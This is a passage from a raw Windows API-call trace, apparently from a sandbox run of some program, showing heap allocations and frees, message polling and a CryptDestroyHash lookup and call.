lpMsg=0x6ae83c) returned 0 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0039.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc88 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce50 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889538 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c910 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca18 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cef8 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb80 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889988 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c760 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c940 [0039.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897d8 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.475] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899d0 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.475] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0039.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0039.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae9a8 [0039.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x7ae9a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0039.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0039.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0039.477] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0039.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0039.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0039.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0039.477] CryptDestroyHash (hHash=0x7c2240) returned 1 [0039.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0039.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.479] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0039.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0039.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0039.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 